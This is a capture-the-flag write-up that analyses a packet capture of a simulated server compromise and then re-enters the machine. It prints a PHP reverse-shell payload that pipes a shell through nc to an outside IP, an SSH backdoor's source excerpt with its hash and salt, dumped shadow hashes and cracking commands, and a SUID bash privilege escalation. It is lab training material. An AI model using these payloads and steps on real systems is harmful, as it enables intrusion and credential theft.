Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened.

Can you work out how the attacker got in, and hack your way back into Overpass' production server?

# Tasks
* URL of page used to upload reverse shell
* Payload used to gain access
* Password used to privesc
* How did attack establish persistence
* Passwords that was compromised.
* Default hash for backdoor
* Hardcoded salt for the backdoor
* Hash the attack used
* Crack hash
* Message left
* user flag
* root flag

# Vulnerabilities
* Upload function not being sanitized
* Weak password all users compromised


# Analysis
Looking at the pcap file, we can see that there was a request made to /development/uploads/
So that is probably the attack vector used for the attacker.
Now since we know that, let's find the POST request made after it was uploaded to the server to see what payload it used. Follow the TCP stream and you'll find this.
```php
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
```
Now let's follow the stream more and now we're in a shell of www-data. Judging by the file, it looks like it knew james password to privesc to a user.
Now it is cloning something from github?
```bash
$ git clone https://github.com/NinjaJc01/ssh-backdoor
```
That sounds malicious, a backdoor. Continuing on, the attacker is dumping /etc/shadow which contains all of the hashes for our users. Let's try and crack them to see if they are compromised.
```bash
  

james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::

paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::

szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::

bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::

muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
```
I tried using hashcat, but it didn't work so I resulted into John The Ripper, it was quite fast.
```bash
$john hash.hash --wordlist=/opt/wordlists/fasttrack.txt
```
Looks like all the passwords were compromised.
Now since we know that It used a github repo to maintain persistence, we can visit the repository and see how it work.
Some programming skills would help to analyze the code.
```go
package main

import (

"crypto/sha512"

"fmt"

"io"

"io/ioutil"

"log"

"net"

"os/exec"

"github.com/creack/pty"

"github.com/gliderlabs/ssh"

"github.com/integrii/flaggy"

gossh "golang.org/x/crypto/ssh"

"golang.org/x/crypto/ssh/terminal"

)

var hash string = "bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3"
```
So looks like it's using sha512 as it's hashing algorithm and there is a default hash created.
Scrolling down more, we'll find  a hardcoded salt.
```go
func passwordHandler(_ ssh.Context, password string) bool {

return verifyPass(hash, "1c362db832f3f864c8c2fe05f2002a05", password)
```

Now we need to determine what the hash attacker used, let's go back to our pcap file.
The attacker ran a command.
```bash
james@overpass-production:~/ssh-backdoor$ ./backdoor -a
```
And it created a hash for the attacker. Now remember we analyzed the code before? Yes, you need to include the salt.
I used haiti to identify which number for hashcat and then I'll crack it.
```bash
$hashcat --force -m 1710 -a 0 -o cracked.txt hash /opt/wordlists/rockyou.txt
```

# Hacking back in.
Okay let's get back our machine, let's perform a nmap scan first to see what ports are open.
```nmap
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 8.2p1 Debian 4 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Okay so let's check out the site first before SSH back in using the backdoor port.
Looks like they left a very heart-warming message,
now let's SSH into the server using the backdoor.
Now we just need to privesc

# Privesc
Now let's see if james can run sudo.
```bash
$sudo -l
Password for James:
```
Looks like they changed the password for james, none of the password works, let's run ls -la on jame's home to see what he has.
```bash
total 1136
drwxr-xr-x 7 james james    4096 Jul 28 07:35 .
drwxr-xr-x 7 root  root     4096 Jul 21  2020 ..
lrwxrwxrwx 1 james james       9 Jul 21  2020 .bash_history -> /dev/null
-rw-r--r-- 1 james james     220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 james james    3771 Apr  4  2018 .bashrc
drwx------ 2 james james    4096 Jul 21  2020 .cache
drwx------ 3 james james    4096 Jul 21  2020 .gnupg
drwxrwxr-x 3 james james    4096 Jul 22  2020 .local
-rw------- 1 james james      51 Jul 21  2020 .overpass
-rw-r--r-- 1 james james     807 Apr  4  2018 .profile
-rw-r--r-- 1 james james       0 Jul 21  2020 .sudo_as_admin_successful
-rwsr-sr-x 1 root  root  1113504 Jul 22  2020 .suid_bash
drwxrwxr-x 3 james james    4096 Jul 22  2020 ssh-backdoor
-rw-rw-r-- 1 james james      38 Jul 22  2020 user.txt
drwxrwxr-x 7 james james    4096 Jul 21  2020 www
```
The .SUID_bash is flashing red, and it appears to have a **s** in it's permission, for those who don't know, that's a SUID bit that can be used to escalate privileges. Let's running the file, to see what happens.
```bash
.suid_bash-4.4$ whoami
james
```
Look's like it just puts us in another shell? so it's just bash with a SUID bit?
Let's try with a -p
```bash
./.suid_bash -p
```
```bash
.suid_bash-4.4# whoami
root
```
So what bash -p does it run the binary with the SUID bit and runs it with those privilege.


